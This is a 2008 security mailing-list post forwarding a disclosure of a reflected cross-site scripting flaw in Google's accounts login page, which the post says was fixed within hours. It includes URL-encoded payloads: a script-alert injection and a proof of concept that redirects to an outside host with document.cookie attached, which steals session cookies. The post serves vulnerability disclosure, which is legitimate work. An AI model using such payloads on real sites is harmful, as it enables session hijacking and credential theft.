[OWASP-Bangalore] Google accounts SSL login page suffers from highly critical XSS

Anil anil.sharma at teaqtech.com
Mon Nov 17 23:54:52 EST 2008


Google accounts SSL login page suffers from highly critical XSS

Written by Dimitris Pagkalos

Wednesday, 12 November 2008

 

In this case, the fact that SSL is being used on the login page, does not
necessarily mean that the users' login information is secured. UPDATE: this
was fixed a few hours after publishing it.

Malicious people can exploit this Google XSS to propagate malware, spyware,
adware and steal authentication credentials.

 

 

XSS:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer
<https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%
27%22%3E%3C/title%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3E%3Cmarquee%3E
%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fww
w.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=serv
ices&utm_medium=redirect&utm_campaign=standalone> &hl=e%27
%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%
3
EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fwww.googl
e
.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm
_
medium=redirect&utm_campaign=standalone

Redirection and document.cookie PoC:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer
<https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%
27%22%3E%3CSCRIPT%3Elocation.href+%3D+%27http%3A%2F%2Fwww.xssed.com/?%27%2Bd
ocument.cookie%3C%2FSCRIPT%3E&continue=https%3A%2F%2Fwww.google.com%2Fanalyt
ics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redir
ect&utm_campaign=standalone> &hl=e'">
<SCRIPT>location.href+%3D+'http%3A%2F%2Fwww.xssed.com/?'%2Bdocument.cookie<%
2F
SCRIPT>&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%
3
Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standa
lone


It is only a matter of minutes before we see it fixed by Google.

 

 

Regards

Anil

-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-bangalore/attachments/20081118/7e4c280e/attachment.html 


More information about the OWASP-Bangalore mailing list